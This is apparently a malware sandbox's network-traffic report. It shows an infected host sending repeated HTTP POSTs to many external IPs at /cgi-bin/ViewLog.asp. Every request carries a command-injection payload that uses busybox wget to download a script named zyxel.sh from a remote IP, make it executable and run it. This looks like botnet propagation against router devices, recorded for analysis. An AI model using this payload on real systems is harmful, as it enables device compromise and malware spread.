                                                            Content-Type: text/html; charset=utf-8
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: frame-ancestors 'none'
                                                            Strict-Transport-Security: max-age=3600
                                                            Content-Length: 130
                                                            Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            936192.168.2.235279094.123.12.788080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:05.320836067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            937192.168.2.234283494.121.146.1408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:05.322757006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            938192.168.2.234395894.121.99.618080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:05.323019981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            939192.168.2.235127894.122.30.1258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:05.323164940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            940192.168.2.235566694.122.10.2448080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:05.323637009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            941192.168.2.235778494.123.21.1208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:05.324561119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            942192.168.2.233867831.136.57.918080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:06.293284893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:06.929619074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:08.177464962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:10.737102985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:15.856337070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:25.838927984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:46.060328007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            943192.168.2.235237831.136.76.2088080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:06.314285040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:06.993558884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:08.337579012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:11.249008894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:16.624284983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:27.378987074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:50.155860901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            944192.168.2.233557831.200.125.1428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:06.339045048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            945192.168.2.235449894.122.220.218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:06.339128971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            946192.168.2.233693662.29.118.2468080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:06.341074944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            947192.168.2.235885095.142.117.58080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:06.432135105 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            948192.168.2.233620285.122.212.338080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:06.888199091 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            949192.168.2.233429431.136.181.1118080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:06.976011038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:07.601500988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:08.849307060 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:11.505034924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:16.624403954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:26.606815100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
